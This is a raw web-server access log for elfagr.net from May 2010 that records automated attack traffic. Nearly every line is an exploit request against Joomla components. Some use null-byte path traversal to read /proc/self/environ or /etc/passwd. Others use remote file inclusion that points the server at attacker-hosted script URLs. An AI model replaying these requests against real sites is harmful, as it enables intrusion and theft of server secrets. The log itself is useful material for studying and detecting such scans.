217.73.239.8 - - [06/May/2010:19:48:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:19:48:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
74.54.22.2 - - [06/May/2010:19:49:30 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.54.22.2 - - [06/May/2010:19:49:22 -0700] "GET /logs/access.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.54.22.2 - - [06/May/2010:19:49:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.73.239.8 - - [06/May/2010:19:54:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.elfagr.net"
216.127.70.140 - - [06/May/2010:19:55:37 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "elfagr.net"
216.127.70.140 - - [06/May/2010:19:55:38 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "elfagr.net"
216.127.70.140 - - [06/May/2010:19:55:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "elfagr.net"
216.127.70.140 - - [06/May/2010:19:55:52 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "elfagr.net"
216.127.70.140 - - [06/May/2010:19:56:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:55:53 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
216.127.70.140 - - [06/May/2010:19:55:53 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:57:10 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:57:48 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:58:02 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:58:11 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:58:11 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:58:10 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:58:10 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:58:10 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:58:24 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:58:29 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:00:26 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:00:35 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:00:27 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.73.239.8 - - [06/May/2010:20:01:53 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:20:01:53 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:20:01:54 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:03:45 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:03:37 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:03:46 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.62.121.162 - - [06/May/2010:20:04:08 -0700] "GET /logs/access.log%20%20/index.php?body=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.62.121.162 - - [06/May/2010:20:04:00 -0700] "GET /logs/index.php?body=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.62.121.162 - - [06/May/2010:20:04:08 -0700] "GET /index.php?body=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:04:48 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.62.121.162 - - [06/May/2010:20:05:10 -0700] "GET /logs/index.php?body=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.62.121.162 - - [06/May/2010:20:05:10 -0700] "GET /index.php?body=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.62.121.162 - - [06/May/2010:20:05:10 -0700] "GET /logs/access.log%20%20/index.php?body=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.73.239.8 - - [06/May/2010:20:07:25 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:20:07:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:20:07:18 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
205.234.252.102 - - [06/May/2010:20:14:32 -0700] "GET /*.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:20:19:53 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:20:20:01 -0700] "GET /*.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:20:20:02 -0700] "GET /logs/*.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:21:17 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:21:17 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:21:26 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:21:34 -0700] "GET /logs/access_091126.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:20:21:25 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:20:21:26 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:20:22:11 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:22:20 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:22:12 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [06/May/2010:20:22:36 -0700] "GET /logs/access_100318.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
217.73.239.8 - - [06/May/2010:20:24:09 -0700] "GET /logs/access_100408.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.elfagr.net"
217.73.239.8 - - [06/May/2010:20:24:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.elfagr.net"
217.73.239.8 - - [06/May/2010:20:24:10 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.elfagr.net"
125.244.25.10 - - [06/May/2010:20:24:35 -0700] "GET /index.php?option=microcms_path&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:24:32 -0700] "GET /logs/access_091126.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:20:24:41 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:20:24:32 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
125.244.25.10 - - [06/May/2010:20:24:42 -0700] "GET /logs/access.log//index.php?option=microcms_path&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
125.244.25.10 - - [06/May/2010:20:24:34 -0700] "GET /index.php?option=microcms_path&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
125.244.25.10 - - [06/May/2010:20:24:44 -0700] "GET /logs//index.php?option=microcms_path&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
216.127.70.140 - - [06/May/2010:20:25:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.elfagr.net"
216.127.70.140 - - [06/May/2010:20:25:37 -0700] "GET /logs/access_091008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.elfagr.net"
216.127.70.140 - - [06/May/2010:20:25:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.elfagr.net"
216.127.70.140 - - [06/May/2010:20:26:54 -0700] "GET /logs/access_091008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.elfagr.net"
216.127.70.140 - - [06/May/2010:20:26:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.elfagr.net"
216.127.70.140 - - [06/May/2010:20:26:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://limarotary.com/logs/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:20:28:44 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:28:45 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:28:45 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:34:27 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:36:50 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:36:51 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:36:51 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:39:08 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:45:12 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:45:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:45:12 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:45:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:45:04 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:45:12 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:46:14 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:46:05 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:46:06 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:49:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:49:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:50:41 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:50:33 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:50:34 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:52:45 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:52:37 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:52:37 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:53:32 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [06/May/2010:20:53:38 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cuitz.com/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:55:31 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:55:22 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:20:55:23 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:57:30 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:57:22 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:57:22 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:59:38 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:59:29 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:20:59:29 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:59:47 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:59:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:59:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:59:39 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:59:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:20:59:39 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
217.16.18.219 - - [06/May/2010:21:02:29 -0700] "GET /logs/access_091126.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:21:02:20 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.16.18.219 - - [06/May/2010:21:02:21 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
205.234.252.102 - - [06/May/2010:21:06:32 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:07:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
64.32.22.130 - - [06/May/2010:21:07:14 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:21:07:14 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:21:07:05 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
174.133.197.114 - - [06/May/2010:21:07:13 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:21:07:13 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:21:07:22 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:21:07:16 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:21:07:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
